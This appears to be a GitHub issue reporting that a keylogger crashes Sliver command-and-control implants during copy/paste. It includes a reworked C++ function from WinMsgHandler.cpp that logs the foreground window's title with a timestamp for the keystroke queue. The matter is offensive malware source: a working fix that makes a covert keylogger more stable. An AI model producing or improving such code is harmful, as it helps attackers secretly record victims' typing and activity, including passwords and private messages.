
Random crash of the implant when copy/pasting

Open smeukinou opened this issue 2 years ago • 0 comments

I found out that the keylogger crashed sliver implants, randomly, but quite quickly (after a few minutes under normal usage) when some copy/paste operations were carried out.

I cannot explain why it crashes, but I found out it's during the only conversion from string to wstring, and for some reason, in some cases, it crashes.

Here is the fixed code in WinMsgHandler.cpp (basically use wide versions of api, to avoid the offending string=>wstring conversion):

```cpp
void WinMsgHandler::checkFocus(UINT keyChar) {
	WCHAR window_title[256] = L"";
	WCHAR wt[300] = L"";
	SYSTEMTIME curr_time;
	GetLocalTime(&curr_time);

	auto hActiveWindow = GetForegroundWindow();
	GetWindowTextW(hActiveWindow, window_title, 256);

	//Insert reference to the current window
	if ((hActiveWindow != hPrevWind)) {

		swprintf(wt, 300, L"\r\n%hu-%hu-%hu %hu:%hu [ %s ]\r\n", curr_time.wYear, curr_time.wMonth,
			curr_time.wDay, curr_time.wHour, curr_time.wMinute, window_title);

		_queue->Push(std::wstring(wt));
		hPrevWind = hActiveWindow;
	}

}
```

smeukinou avatar Apr 14 '23 07:04 smeukinou